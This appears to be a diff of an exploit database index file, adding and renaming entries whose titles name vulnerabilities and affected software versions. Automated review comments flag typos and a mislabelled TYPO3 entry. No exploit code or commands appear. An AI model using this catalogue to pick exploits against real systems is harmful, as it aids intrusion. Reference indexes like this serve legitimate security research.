20400,platforms/cgi/dos/20400.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 - Denial of Service",2000-11-10,sozni,cgi,dos,0
@ -18005,6 +18008,7 @@ id,file,description,date,author,platform,type,port
20677,platforms/windows/webapps/20677.txt,"IOServer 1.0.18.0 - Directory Traversal",2012-08-20,hinge,windows,webapps,0
20678,platforms/unix/local/20678.c,"Rob Malda ASCDC 0.3 - Buffer Overflow (1)",2001-03-08,anonymous,unix,local,0
20679,platforms/unix/local/20679.c,"Rob Malda ASCDC 0.3 - Buffer Overflow (2)",2001-03-08,"the itch",unix,local,0
40426,platforms/windows/local/40426.txt,"MSI - NTIOLib.sys / WinIO.sys Local Privilege Escalation",2016-09-26,ReWolf,windows,local,0
20680,platforms/windows/remote/20680.html,"Microsoft Internet Explorer 5.0.1/5.5/6.0 - Telnet Client File Overwrite",2001-03-09,"Oliver Friedrichs",windows,remote,0
20681,platforms/windows/dos/20681.c,"Baltimore Technologies WEBsweeper 4.0 - Denial of Service",2001-01-22,honoriak,windows,dos,0
20682,platforms/windows/dos/20682.txt,"Michael Lamont Savant Web Server 3.0 - Denial of Service",2001-03-09,Phiber,windows,dos,0
@ -18036,6 +18040,7 @@ id,file,description,date,author,platform,type,port
20720,platforms/linux/local/20720.c,"Linux Kernel 2.2.18 (RedHat 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (1)",2001-03-27,"Wojciech Purczynski",linux,local,0
20721,platforms/linux/local/20721.c,"Linux Kernel 2.2.18 (RedHat 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (2)",2001-03-27,"Wojciech Purczynski",linux,local,0
20722,platforms/multiple/remote/20722.txt,"Caucho Technology Resin 1.2/1.3 - JavaBean Disclosure",2001-04-03,lovehacker,multiple,remote,0
40425,platforms/windows/local/40425.txt,"Elantech-Smart Pad 11.9.0.0 - Unquoted Service Path Privilege Escalation",2016-09-26,zaeek,windows,local,0
20723,platforms/windows/remote/20723.pl,"Gene6 BPFTP FTP Server 2.0 - User Credentials Disclosure",2001-04-03,"Rob Beck",windows,remote,0
20724,platforms/hp-ux/local/20724.txt,"Shareplex 2.1.3.9/2.2.2 Beta - Arbitrary Local File Disclosure",2001-03-30,"Dixie Flatline",hp-ux,local,0
20725,platforms/cgi/remote/20725.txt,"Microburst uStorekeeper 1.x - Arbitrary Commands",2001-04-02,"UkR hacking team",cgi,remote,0
@ -18075,6 +18080,7 @@ id,file,description,date,author,platform,type,port
20759,platforms/php/webapps/20759.txt,"letodms 3.3.6 - Multiple Vulnerabilities",2012-08-23,"Shai rod",php,webapps,0
20760,platforms/php/webapps/20760.txt,"op5 Monitoring 5.4.2 - (VM Applicance) Multiple Vulnerabilities",2012-08-23,loneferret,php,webapps,0
20764,platforms/solaris/remote/20764.txt,"Solaris 2.6 - FTP Core Dump Shadow Password Recovery",2001-04-17,warning3,solaris,remote,0
40423,platforms/php/webapps/40423.txt,"Joomla! Component Event Booking 2.10.1 - SQL Injection",2016-09-26,"Persian Hack Team",php,webapps,80
20765,platforms/linux/remote/20765.pl,"Linux Kernel 2.4 - IPTables FTP Stateful Inspection Arbitrary Filter Rule Insertion",2001-04-16,"Cristiano Lincoln Mattos",linux,remote,0
20766,platforms/unix/local/20766.c,"SGI IRIX 6.5 / Solaris 7.0/8 - CDE dtsession Buffer Overflow",2001-04-11,"Last Stage of Delirium",unix,local,0
20767,platforms/solaris/local/20767.c,"Solaris 2.5/2.6/7.0/8 - kcms_configure KCMS_PROFILES Buffer Overflow (1)",1999-12-01,"Last Stage of Delirium",solaris,local,0
@ -18122,6 +18128,7 @@ id,file,description,date,author,platform,type,port
20810,platforms/multiple/dos/20810.c,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (1)",1997-11-20,m3lt,multiple,dos,0
20811,platforms/multiple/dos/20811.cpp,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (2)",1997-11-20,"Konrad Malewski",multiple,dos,0
20812,platforms/windows/dos/20812.c,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (3)",1997-11-20,m3lt,windows,dos,0
40422,platforms/windows/local/40422.txt,"NetDrive 2.6.12 - Unquoted Service Path Privilege Escalation",2016-09-26,Tulpa,windows,local,0
20813,platforms/multiple/dos/20813.c,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (4)",1997-11-20,MondoMan,multiple,dos,0
20814,platforms/windows/dos/20814.c,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (5)",1997-11-20,"Dejan Levaja",windows,dos,0
20815,platforms/windows/remote/20815.pl,"Microsoft IIS 5.0 - '.printer' ISAPI Extension Buffer Overflow (1)",2001-05-01,storm,windows,remote,0
@ -18718,7 +18725,7 @@ id,file,description,date,author,platform,type,port
21427,platforms/php/webapps/21427.txt,"MiniBB 1.2 - Cross-Site Scripting",2002-04-17,frog,php,webapps,0
21428,platforms/php/dos/21428.txt,"Messagerie 1.0 - Arbitrary User Removal Denial of Service",2002-04-27,frog,php,dos,0
21429,platforms/windows/dos/21429.c,"3CDaemon 2.0 - Buffer Overflow (1)",2002-04-15,"MaD SKiLL",windows,dos,0
22216,platforms/php/webapps/22216.txt,"bitweaver 2.8.1 - Multiple Vulnerabilities",2012-10-24,"Trustwave's SpiderLabs",php,webapps,0
22216,platforms/php/webapps/22216.txt,"Bitweaver 2.8.1 - Multiple Vulnerabilities",2012-10-24,"Trustwave's SpiderLabs",php,webapps,0
21431,platforms/irix/dos/21431.txt,"IRIX 6.5.x - Performance Co-Pilot Remote Denial of Service",2002-04-12,"Marcelo Magnasco",irix,dos,0
21432,platforms/windows/dos/21432.txt,"BEA Systems WebLogic Server and Express 7.0 - Null Character Denial of Service",2002-04-30,"Peter Gründl",windows,dos,0
21433,platforms/cgi/webapps/21433.txt,"MyGuestbook 1.0 - Script Injection",2002-04-30,BrainRawt,cgi,webapps,0
@ -18965,6 +18972,8 @@ id,file,description,date,author,platform,type,port
40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Password Protected TCP Bind Shell (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
40364,platforms/php/webapps/40364.txt,"wdCalendar 2 - SQL Injection",2016-09-13,"Alfonso Castillo Angel",php,webapps,80
40365,platforms/windows/local/40365.txt,"Zapya Desktop 1.803 - 'ZapyaService.exe' Privilege Escalation",2016-09-13,"Arash Khazaei",windows,local,0
40366,platforms/php/webapps/40366.txt,"Contrexx CMS egov Module 1.0.0 - SQL Injection",2016-09-13,"hamidreza borghei",php,webapps,80
40429,platforms/windows/local/40429.cs,"Microsoft Windows 10 10586 (x32/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0
40367,platforms/cgi/webapps/40367.sh,"Exper EWM-01 ADSL/MODEM - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
21673,platforms/windows/dos/21673.txt,"IPSwitch IMail 6.x/7.0.x - Web Calendaring Incomplete Post Denial of Service",2002-07-30,anonymous,windows,dos,0
21674,platforms/linux/local/21674.c,"William Deich Super 3.x - SysLog Format String",2002-07-31,gobbles,linux,local,0
@ -19432,11 +19441,11 @@ id,file,description,date,author,platform,type,port
22152,platforms/php/webapps/22152.txt,"Joomla! Plugin Commedia - 'index.php task Parameter' SQL Injection",2012-10-22,D4NB4R,php,webapps,0
22153,platforms/php/webapps/22153.pl,"Joomla! Component Kunena - 'index.php search Parameter' SQL Injection",2012-10-22,D35m0nd142,php,webapps,0
22154,platforms/windows/dos/22154.pl,"RealPlayer 15.0.6.14.3gp - Crash (PoC)",2012-10-22,coolkaveh,windows,dos,0
22156,platforms/php/webapps/22156.txt,"White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-10-22,pcsjj,php,webapps,0
22156,platforms/php/webapps/22156.txt,"Wordpress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-10-22,pcsjj,php,webapps,0
22157,platforms/php/webapps/22157.txt,"Schoolhos CMS Beta 2.29 - (index.php id Parameter) SQL Injection",2012-10-22,Cumi,php,webapps,0
22158,platforms/php/webapps/22158.txt,"WordPress Plugin social discussions 6.1.1 - Multiple Vulnerabilities",2012-10-22,waraxe,php,webapps,0
22159,platforms/php/webapps/22159.txt,"subrion CMS 2.2.1 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0
22160,platforms/php/webapps/22160.txt,"atutor 1.2 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0
22160,platforms/php/webapps/22160.txt,"ATutor 1.2 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0
22161,platforms/windows/remote/22161.rb,"Turbo FTP Server 1.30.823 - PORT Overflow (Metasploit)",2012-10-23,Metasploit,windows,remote,21
22162,platforms/windows/dos/22162.txt,"Symantec Norton Internet Security 2003 - ICMP Packet Flood Denial of Service",2003-01-13,"Pavel P",windows,dos,0
22163,platforms/php/webapps/22163.txt,"Geeklog 1.3.7 - profiles.php Multiple Cross-Site Scripting Vulnerabilities",2003-01-14,snooq,php,webapps,0
@ -19593,7 +19602,7 @@ id,file,description,date,author,platform,type,port
22315,platforms/php/webapps/22315.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (1)",2003-02-28,"Martin Eiszner",php,webapps,0
22316,platforms/php/webapps/22316.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (2)",2003-02-28,"Martin Eiszner",php,webapps,0
22317,platforms/php/webapps/22317.txt,"GTCatalog 0.8.16/0.9 - Remote File Inclusion",2003-03-03,frog,php,webapps,0
40413,platforms/php/webapps/40413.txt,"Joomla Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2016-09-22,"Larry W. Cashdollar",php,webapps,80
40413,platforms/php/webapps/40413.txt,"Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2016-09-22,"Larry W. Cashdollar",php,webapps,80
22318,platforms/php/webapps/22318.txt,"Webchat 0.77 - Defines.php Remote File Inclusion",2003-03-03,frog,php,webapps,0
22319,platforms/hardware/remote/22319.txt,"HP JetDirect Printer - SNMP JetAdmin Device Password Disclosure",2003-03-03,"Sven Pechler",hardware,remote,0
22320,platforms/linux/local/22320.c,"XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (1)",2003-03-03,"dcryptr && tarranta",linux,local,0
@ -20737,7 +20746,7 @@ id,file,description,date,author,platform,type,port
23491,platforms/windows/remote/23491.pl,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (1)",2003-12-29,fiNis,windows,remote,0
23492,platforms/windows/remote/23492.c,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (2)",2003-12-29,D4rkGr3y,windows,remote,0
23493,platforms/windows/remote/23493.txt,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (3)",2003-12-29,"Luigi Auriemma",windows,remote,0
23494,platforms/php/webapps/23494.txt,"Clockstone and other CMSMasters Theme - Arbitrary File Upload",2012-12-19,DigiP,php,webapps,0
23494,platforms/php/webapps/23494.txt,"Wordpress Theme Clockstone (and other CMSMasters Themes) - Arbitrary File Upload",2012-12-19,DigiP,php,webapps,0
23630,platforms/php/webapps/23630.txt,"Aprox Portal 3.0 - File Disclosure",2004-01-31,"Zero X",php,webapps,0
23496,platforms/windows/dos/23496.txt,"DIMIN Viewer 5.4.0 - GIF Decode Crash (PoC)",2012-12-19,"Lizhi Wang",windows,dos,0
23693,platforms/windows/dos/23693.txt,"Sami FTP Server 1.1.3 - Library Crafted GET Request Remote Denial of Service",2004-02-13,"intuit e.b.",windows,dos,0
@ -22465,7 +22474,7 @@ id,file,description,date,author,platform,type,port
25289,platforms/linux/local/25289.c,"Linux Kernel 2.4.30 / 2.6.11.5 - BlueTooth 'bluez_sock_create' Privilege Escalation",2005-10-19,backdoored.net,linux,local,0
25291,platforms/multiple/remote/25291.txt,"Tincat Network Library - Remote Buffer Overflow",2005-03-28,"Luigi Auriemma",multiple,remote,0
25292,platforms/hardware/webapps/25292.txt,"Cisco Linksys E4200 Firmware - Multiple Vulnerabilities",2013-05-07,sqlhacker,hardware,webapps,0
25775,platforms/linux/remote/25775.rb,"Nginx HTTP Server 1.3.9 < 1.4.0 - Chuncked Encoding Stack Buffer Overflow (Metasploit)",2013-05-28,Metasploit,linux,remote,80
25775,platforms/linux/remote/25775.rb,"Nginx 1.3.9 < 1.4.0 - Chuncked Encoding Stack Buffer Overflow (Metasploit)",2013-05-28,Metasploit,linux,remote,80
25295,platforms/hardware/dos/25295.txt,"Huawei SNMPv3 Service - Multiple Buffer Overflow Vulnerabilities",2013-05-07,"Roberto Paleari",hardware,dos,0
25296,platforms/windows/local/25296.rb,"AudioCoder - '.m3u' Buffer Overflow (Metasploit)",2013-05-07,Metasploit,windows,local,0
25297,platforms/linux/remote/25297.txt,"Dovecot with Exim sender_address Parameter - Remote Command Execution",2013-05-07,"RedTeam Pentesting GmbH",linux,remote,0
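Review bot: The renamed Nginx line keeps `Chuncked Encoding` in the description it rewrites, so the typo survives the cleanup of the product name. If the rename is meant to normalise the title it should read `Nginx 1.3.9 < 1.4.0 - Chunked Encoding Stack Buffer Overflow (Metasploit)`. Dropping `HTTP Server` from the product name is otherwise fine.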
@ -22959,6 +22968,7 @@ id,file,description,date,author,platform,type,port
33418,platforms/php/webapps/33418.txt,"Joomla! Component com_joomportfolio - 'secid' Parameter SQL Injection",2009-12-17,"Fl0riX and Snakespc",php,webapps,0
33419,platforms/php/webapps/33419.txt,"F3Site 2009 - mod/poll.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0
33420,platforms/php/webapps/33420.txt,"F3Site 2009 - mod/new.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0
40390,platforms/php/webapps/40390.php,"BuilderEngine 3.5.0 - Arbitrary File Upload",2016-09-19,metanubix,php,webapps,80
33421,platforms/php/webapps/33421.txt,"Ampache 3.4.3 - 'login.php' Multiple SQL Injection",2009-12-18,R3d-D3V!L,php,webapps,0
33422,platforms/php/webapps/33422.txt,"JBC Explorer 7.20 - 'arbre.php' Cross-Site Scripting",2009-12-20,Metropolis,php,webapps,0
33423,platforms/hardware/remote/33423.txt,"Barracuda Web Application Firewall 660 - 'cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities",2009-12-19,Global-Evolution,hardware,remote,0
@ -23618,7 +23628,7 @@ id,file,description,date,author,platform,type,port
26450,platforms/windows/dos/26450.pl,"Baby FTP Server 1.24 - Denial of Service",2013-06-26,Chako,windows,dos,21
26451,platforms/linux/local/26451.rb,"ZPanel zsudo - Privilege Escalation (Metasploit)",2013-06-26,Metasploit,linux,local,0
26452,platforms/win_x86/local/26452.rb,"Novell Client 2 SP3 - nicm.sys Privilege Escalation (Metasploit)",2013-06-26,Metasploit,win_x86,local,0
26453,platforms/php/webapps/26453.py,"PHP Charts 1.0 - (index.php type Parameter) Remote Code Execution",2013-06-26,infodox,php,webapps,0
26453,platforms/php/webapps/26453.py,"PHP-Charts 1.0 - (index.php type Parameter) Remote Code Execution",2013-06-26,infodox,php,webapps,0
26454,platforms/freebsd/local/26454.rb,"FreeBSD 9 - Address Space Manipulation Privilege Escalation (Metasploit)",2013-06-26,Metasploit,freebsd,local,0
26455,platforms/php/webapps/26455.txt,"VUBB - 'index.php' Cross-Site Scripting",2005-11-01,"Alireza Hassani",php,webapps,0
26456,platforms/php/webapps/26456.txt,"XMB Forum 1.9.3 - post.php SQL Injection",2005-11-01,almaster,php,webapps,0
@ -24442,7 +24452,7 @@ id,file,description,date,author,platform,type,port
27273,platforms/windows/dos/27273.txt,"TEC-IT TBarCode - OCX ActiveX Control (TBarCode4.ocx 4.1.0) Crash (PoC)",2013-08-02,d3b4g,windows,dos,0
27274,platforms/php/webapps/27274.txt,"Ginkgo CMS - 'index.php rang Parameter' SQL Injection",2013-08-02,Raw-x,php,webapps,0
27275,platforms/php/webapps/27275.txt,"FunGamez - Arbitrary File Upload",2013-08-02,"cr4wl3r ",php,webapps,0
27276,platforms/php/webapps/27276.html,"Bigace CMS 2.7.8 - Cross-Site Request Forgery (Add Admin)",2013-08-02,"Yashar shahinzadeh",php,webapps,0
27276,platforms/php/webapps/27276.html,"BigACE CMS 2.7.8 - Cross-Site Request Forgery (Add Admin)",2013-08-02,"Yashar shahinzadeh",php,webapps,0
27277,platforms/windows/remote/27277.py,"PCMAN FTP 2.07 - PASS Command Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0
27528,platforms/hardware/remote/27528.rb,"D-Link Devices - Unauthenticated Remote Command Execution (2)",2013-08-12,Metasploit,hardware,remote,0
27279,platforms/php/webapps/27279.txt,"vtiger CRM 5.4.0 (SOAP Services) - Multiple Vulnerabilities",2013-08-02,EgiX,php,webapps,0
@ -25029,7 +25039,7 @@ id,file,description,date,author,platform,type,port
27886,platforms/php/webapps/27886.txt,"Sphider 1.3 - search.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-16,Soot,php,webapps,0
27887,platforms/multiple/remote/27887.txt,"SAP Web Application Server 6.x/7.0 - Input Validation",2005-11-09,"Arnold Grossmann",multiple,remote,0
27888,platforms/java/webapps/27888.txt,"Caucho Resin 3.0.17/3.0.18 - Viewfile Information Disclosure",2006-05-16,"Joseph Pierini",java,webapps,0
27889,platforms/php/webapps/27889.txt,"BoastMachine 3.1 - admin.php Cross-Site Scripting",2006-05-17,"Yunus Emre Yilmaz",php,webapps,0
27889,platforms/php/webapps/27889.txt,"BoastMachine 3.1 - 'admin.php' Cross-Site Scripting",2006-05-17,"Yunus Emre Yilmaz",php,webapps,0
27890,platforms/asp/webapps/27890.txt,"Open Wiki 0.78 - 'ow.asp' Cross-Site Scripting",2006-05-17,LiNuX_rOOt,asp,webapps,0
27891,platforms/hardware/remote/27891.txt,"Ipswitch WhatsUp Professional 2006 - Authentication Bypass",2006-05-17,"Kenneth F. Belva",hardware,remote,0
27892,platforms/hardware/remote/27892.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - help Script Cross-Site Scripting",2006-05-17,"Jaime Blasco",hardware,remote,0
@ -25503,7 +25513,7 @@ id,file,description,date,author,platform,type,port
28404,platforms/php/webapps/28404.txt,"Mambo Rssxt Component 1.0 - MosConfig_absolute_path Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0
28405,platforms/linux/local/28405.txt,"Roxio Toast 7 - DejaVu Component PATH Variable Privilege Escalation",2006-08-18,Netragard,linux,local,0
28406,platforms/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 - Icon_Topic SQL Injection",2006-08-19,"Chris Boulton",php,webapps,0
28407,platforms/php/remote/28407.rb,"Western Digital Arkeia - Remote Code Execution (Metasploit)",2013-09-20,xistence,php,remote,0
28407,platforms/php/remote/28407.rb,"Western Digital Arkeia - Remote Code Execution (Metasploit) (1)",2013-09-20,xistence,php,remote,0
28408,platforms/php/remote/28408.rb,"OpenEMR 4.1.1 Patch 14 - SQL Injection / Privilege Escalation / Remote Code Execution (Metasploit)",2013-09-20,xistence,php,remote,0
28409,platforms/php/webapps/28409.txt,"Vtiger CRM 5.4.0 - (index.php onlyforuser Parameter) SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0
28410,platforms/php/webapps/28410.txt,"Mambo Display MOSBot Manager Component - MosConfig_absolute_path Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0
@ -26110,7 +26120,7 @@ id,file,description,date,author,platform,type,port
29017,platforms/php/webapps/29017.txt,"Plesk 7.5/8.0 - get_password.php Cross-Site Scripting",2006-11-14,"David Vieira-Kurz",php,webapps,0
29018,platforms/php/webapps/29018.txt,"Plesk 7.5/8.0 - login_up.php3 Cross-Site Scripting",2006-11-14,"David Vieira-Kurz",php,webapps,0
29019,platforms/php/webapps/29019.txt,"Zikula CMS 1.3.5 - Multiple Vulnerabilities",2013-10-17,Vulnerability-Lab,php,webapps,0
29020,platforms/php/webapps/29020.txt,"Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting",2013-10-17,Zy0d0x,php,webapps,80
29020,platforms/php/webapps/29020.txt,"Wordpress Plugin Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting",2013-10-17,Zy0d0x,php,webapps,80
29021,platforms/php/webapps/29021.txt,"WordPress Plugin Realty - Blind SQL Injection",2013-10-17,Napsterakos,php,webapps,80
29023,platforms/php/webapps/29023.txt,"Woltlab Burning Board Regenbogenwiese 2007 Addon - SQL Injection",2013-10-17,"Easy Laster",php,webapps,0
29024,platforms/asp/webapps/29024.txt,"Inventory Manager - Multiple Input Validation Vulnerabilities",2006-11-14,"laurent gaffie",asp,webapps,0
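Review bot: The new Quick Paypal Payments line carries the `Presistant` misspelling forward and spells the prefix `Wordpress Plugin`, while the Realty entry on the very next line (29021) uses `WordPress Plugin` and the rest of the visible index spells the class `Persistent Cross-Site Scripting`. Suggest `WordPress Plugin Quick Paypal Payments 3.0 - Persistent Cross-Site Scripting` so the two adjacent plugin entries agree.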
@ -26580,7 +26590,7 @@ id,file,description,date,author,platform,type,port
30047,platforms/php/webapps/30047.txt,"vBulletin 3.6.6 - calendar.php HTML Injection",2007-05-16,"laurent gaffie",php,webapps,0
30048,platforms/asp/webapps/30048.html,"VP-ASP Shopping Cart 6.50 - ShopContent.asp Cross-Site Scripting",2007-05-17,"John Martinelli",asp,webapps,0
30049,platforms/windows/remote/30049.html,"LeadTools MultiMedia 15 - 'Ltmm15.dll' ActiveX Control Stack Buffer Overflow",2007-05-17,shinnai,windows,remote,0
30050,platforms/php/webapps/30050.html,"Redoable 1.2 Theme - header.php s Parameter Cross-Site Scripting",2007-05-17,"John Martinelli",php,webapps,0
30050,platforms/php/webapps/30050.html,"Wordpress Theme Redoable 1.2 - header.php s Parameter Cross-Site Scripting",2007-05-17,"John Martinelli",php,webapps,0
30051,platforms/php/webapps/30051.txt,"PsychoStats 2.3 - Server.php Full Path Disclosure",2007-05-17,kefka,php,webapps,0
30052,platforms/multiple/remote/30052.txt,"Apache Tomcat 6.0.10 - Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"Ferruh Mavituna",multiple,remote,0
30053,platforms/php/webapps/30053.txt,"ClientExec 3.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,r0t,php,webapps,0
@ -27632,7 +27642,7 @@ id,file,description,date,author,platform,type,port
30634,platforms/php/webapps/30634.txt,"Content Builder 0.7.5 - postComment.php Remote File Inclusion",2007-10-03,"Mehrad Ansari Targhi",php,webapps,0
30635,platforms/windows/remote/30635.pl,"Microsoft Windows 2000/2003 - Recursive DNS Spoofing (1)",2007-11-13,"Alla Berzroutchko",windows,remote,0
30636,platforms/windows/remote/30636.pl,"Microsoft Windows 2000/2003 - Recursive DNS Spoofing (2)",2007-11-13,"Alla Berzroutchko",windows,remote,0
30637,platforms/php/webapps/30637.js,"Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery",2007-10-04,"David Kierznowski",php,webapps,0
30637,platforms/php/webapps/30637.js,"Wordpress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery",2007-10-04,"David Kierznowski",php,webapps,0
30638,platforms/php/webapps/30638.txt,"GForge 3.1/4.5/4.6 - Verify.php Cross-Site Scripting",2007-10-04,"Jose Sanchez",php,webapps,0
30968,platforms/php/webapps/30968.txt,"MODx 0.9.6.1 - 'htcmime.php' Source Code Information Disclosure",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0
30639,platforms/cgi/webapps/30639.txt,"Cart32 6.x - GetImage Arbitrary File Download",2007-10-04,"Paul Craig",cgi,webapps,0
@ -27652,7 +27662,7 @@ id,file,description,date,author,platform,type,port
30653,platforms/php/webapps/30653.txt,"phpMyAdmin 2.11.1 - setup.php Cross-Site Scripting",2007-10-09,"Omer Singer",php,webapps,0
30654,platforms/php/webapps/30654.txt,"ActiveKB NX 2.6 - 'index.php' Cross-Site Scripting",2007-10-11,durito,php,webapps,0
30655,platforms/php/webapps/30655.txt,"Joomla! Component Search 1.0.13 - SearchWord Cross-Site Scripting",2007-10-11,MustLive,php,webapps,0
30656,platforms/php/webapps/30656.txt,"boastMachine 2.8 - 'index.php' Local File Inclusion",2007-10-11,iNs,php,webapps,0
30656,platforms/php/webapps/30656.txt,"BoastMachine 2.8 - 'index.php' Local File Inclusion",2007-10-11,iNs,php,webapps,0
30657,platforms/php/webapps/30657.txt,"UMI CMS - 'index.php' Cross-Site Scripting",2007-10-11,anonymous,php,webapps,0
30658,platforms/php/webapps/30658.txt,"CRS Manager - Multiple Remote File Inclusion",2007-10-11,iNs,php,webapps,0
30659,platforms/php/webapps/30659.txt,"Nucleus CMS 3.0.1 - 'index.php' Cross-Site Scripting",2007-10-11,MustLive,php,webapps,0
@ -30664,7 +30674,7 @@ id,file,description,date,author,platform,type,port
33935,platforms/windows/remote/33935.txt,"rbot 0.9.14 - '!react' Command Unauthorized Access",2010-02-24,nks,windows,remote,0
33958,platforms/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 - 'sid' Parameter SQL Injection",2010-05-06,"Christophe de la Fuente",cgi,webapps,0
33957,platforms/php/webapps/33957.txt,"kloNews 2.0 - 'cat.php' Cross-Site Scripting",2010-01-20,"cr4wl3r ",php,webapps,0
33937,platforms/multiple/webapps/33937.txt,"TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,multiple,webapps,0
33937,platforms/multiple/webapps/33937.txt,"Wordpress Plugin TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,multiple,webapps,0
33938,platforms/hardware/remote/33938.txt,"Sterlite SAM300 AX Router - 'Stat_Radio' Parameter Cross-Site Scripting",2010-02-04,"Karn Ganeshen",hardware,remote,0
33939,platforms/java/webapps/33939.txt,"ShopEx Single 4.5.1 - 'errinfo' Parameter Cross-Site Scripting",2010-02-06,"cp77fk4r ",java,webapps,0
33940,platforms/multiple/remote/33940.txt,"VMware View 3.1.x - URL Processing Cross-Site Scripting",2010-05-05,"Alexey Sintsov",multiple,remote,0
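Review bot: The renamed 33937 line prefixes a `TYPO3 ... Extension` entry with `Wordpress Plugin`, which contradicts the rest of the description: the title itself says it is a TYPO3 extension and the platform column is `multiple`, not a WordPress-specific entry. Unless the advisory really concerns a WordPress port of the tagcloud (nothing in the visible line suggests so), the old description should be kept, or the prefix replaced with something consistent with the title such as `TYPO3 Extension t3m_cumulus_tagcloud 1.0 - HTML Injection / Cross-Site Scripting`. This looks like a bulk prefixing step that matched the wrong entry; worth checking the other renamed lines for the same false positive.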
@ -30819,7 +30829,7 @@ id,file,description,date,author,platform,type,port
34113,platforms/php/webapps/34113.py,"Silverstripe CMS 2.4 - File Renaming Security Bypass",2010-06-09,"John Leitch",php,webapps,0
34105,platforms/php/webapps/34105.txt,"WordPress Plugin Gallery Objects 0.4 - SQL Injection",2014-07-18,"Claudio Viviani",php,webapps,80
34106,platforms/php/webapps/34106.txt,"cPanel 11.25 Image Manager - 'target' Parameter Local File Inclusion",2010-06-07,"AnTi SeCuRe",php,webapps,0
34107,platforms/php/webapps/34107.txt,"boastMachine 3.1 - 'key' Parameter Cross-Site Scripting",2010-06-07,"High-Tech Bridge SA",php,webapps,0
34107,platforms/php/webapps/34107.txt,"BoastMachine 3.1 - 'key' Parameter Cross-Site Scripting",2010-06-07,"High-Tech Bridge SA",php,webapps,0
34108,platforms/java/webapps/34108.txt,"PRTG Traffic Grapher 6.2.1 - 'url' Parameter Cross-Site Scripting",2009-01-08,"Patrick Webster",java,webapps,0
34109,platforms/php/webapps/34109.html,"log1 CMS 2.0 - Session Handling Remote Security Bypass / Remote File Inclusion",2010-06-03,"High-Tech Bridge SA",php,webapps,0
34110,platforms/php/webapps/34110.txt,"PG Auto Pro - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,php,webapps,0
@ -30971,7 +30981,7 @@ id,file,description,date,author,platform,type,port
34291,platforms/php/webapps/34291.txt,"Joomla! Component Rapid-Recipe - HTML Injection",2010-07-10,Sid3^effects,php,webapps,0
34292,platforms/php/webapps/34292.txt,"eliteCMS 1.01 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0
34293,platforms/java/webapps/34293.txt,"dotDefender 4.02 - 'clave' Parameter Cross-Site Scripting",2010-07-12,"David K",java,webapps,0
34294,platforms/php/webapps/34294.txt,"Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-09,"Jelmer de Hen",php,webapps,0
34294,platforms/php/webapps/34294.txt,"Wordpress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-09,"Jelmer de Hen",php,webapps,0
